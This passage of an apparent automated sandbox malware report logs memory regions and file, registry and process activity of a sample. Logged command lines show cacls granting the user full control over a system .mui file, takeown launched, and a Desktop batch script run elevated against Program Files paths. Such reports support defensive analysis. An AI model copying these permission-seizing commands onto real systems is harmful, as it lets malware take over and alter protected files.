| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x68c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xca8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PDIALOG.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "PDIALOG.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #110: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #110 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:21 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x85c |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
530
0x
A9C
0x
D40
0x
E78
0x
E64
0x
E68
0x
7B4
0x
EA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000bf48690000 | 0xbf48690000 | 0xbf486affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf48690000 | 0xbf48690000 | 0xbf4869ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000bf486a0000 | 0xbf486a0000 | 0xbf486affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf486b0000 | 0xbf486b0000 | 0xbf486c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000bf486d0000 | 0xbf486d0000 | 0xbf487cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf487d0000 | 0xbf487d0000 | 0xbf487d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000bf487e0000 | 0xbf487e0000 | 0xbf487e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xbf487f0000 | 0xbf488adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000bf488b0000 | 0xbf488b0000 | 0xbf488b6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf488c0000 | 0xbf488c0000 | 0xbf488c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000bf488d0000 | 0xbf488d0000 | 0xbf488d6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf488e0000 | 0xbf488e0000 | 0xbf488e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0xbf488f0000 | 0xbf48923fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000bf488f0000 | 0xbf488f0000 | 0xbf488f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf48900000 | 0xbf48900000 | 0xbf48900fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf48910000 | 0xbf48910000 | 0xbf48912fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0xbf48920000 | 0xbf48920fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000bf48930000 | 0xbf48930000 | 0xbf48931fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000bf48970000 | 0xbf48970000 | 0xbf48a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf48a70000 | 0xbf48a70000 | 0xbf48b6ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0xbf48b70000 | 0xbf48c45fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0xbf48b70000 | 0xbf48ea6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000bf48eb0000 | 0xbf48eb0000 | 0xbf48faffff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf48fb0000 | 0xbf48fb0000 | 0xbf490affff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf490b0000 | 0xbf490b0000 | 0xbf491affff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf491b0000 | 0xbf491b0000 | 0xbf492affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000bf492b0000 | 0xbf492b0000 | 0xbf49437fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000bf49440000 | 0xbf49440000 | 0xbf495c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000bf495d0000 | 0xbf495d0000 | 0xbf4a9cffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000bf4a9d0000 | 0xbf4a9d0000 | 0xbf4ab8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf4a9d0000 | 0xbf4a9d0000 | 0xbf4aacffff | Private Memory | rw |
|
|
|
- |
| private_0x000000bf4ab80000 | 0xbf4ab80000 | 0xbf4ab8ffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0xbf4ab90000 | 0xbf4acd0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff360000 | 0x7df5ff360000 | 0x7ff5ff35ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6a4c7c000 | 0x7ff6a4c7c000 | 0x7ff6a4c7dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4c7e000 | 0x7ff6a4c7e000 | 0x7ff6a4c7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6a4c80000 | 0x7ff6a4c80000 | 0x7ff6a4d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6a4d80000 | 0x7ff6a4d80000 | 0x7ff6a4da2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6a4da4000 | 0x7ff6a4da4000 | 0x7ff6a4da4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4da6000 | 0x7ff6a4da6000 | 0x7ff6a4da7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4da8000 | 0x7ff6a4da8000 | 0x7ff6a4da9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4daa000 | 0x7ff6a4daa000 | 0x7ff6a4dabfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4dac000 | 0x7ff6a4dac000 | 0x7ff6a4dadfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4dae000 | 0x7ff6a4dae000 | 0x7ff6a4daffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff6a4de0000 | 0x7ff6a4de6fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ff8dd900000 | 0x7ff8dd94afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e57b0000 | 0x7ff8e5a23fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #112: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #112 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:24, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x928 |
| Parent PID | 0xac8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
96C
0x
5EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000810000 | 0x00810000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x0081ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x00823fff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x04841fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x04843fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004850000 | 0x04850000 | 0x04863fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004870000 | 0x04870000 | 0x048affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048b0000 | 0x048b0000 | 0x048effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048f0000 | 0x048f0000 | 0x048f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x04900fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004910000 | 0x04910000 | 0x04911fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04920000 | 0x049ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04a60000 | 0x04a61fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04d30000 | 0x05066fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74260000 | 0x74287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e1e0000 | 0x7e1e0000 | 0x7e2dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e2e0000 | 0x7e2e0000 | 0x7e302fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e306000 | 0x7e306000 | 0x7e308fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e309000 | 0x7e309000 | 0x7e309fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e30c000 | 0x7e30c000 | 0x7e30efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e30f000 | 0x7e30f000 | 0x7e30ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #113: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #113 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x744 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9A8
0x
E28
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000740000 | 0x00740000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x0074ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00753fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x00761fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x00763fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00783fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x008d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04e8ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e90000 | 0x051c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fd20000 | 0x7fd20000 | 0x7fe1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fe20000 | 0x7fe20000 | 0x7fe42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fe48000 | 0x7fe48000 | 0x7fe4afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe4b000 | 0x7fe4b000 | 0x7fe4dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe4e000 | 0x7fe4e000 | 0x7fe4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe4f000 | 0x7fe4f000 | 0x7fe4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
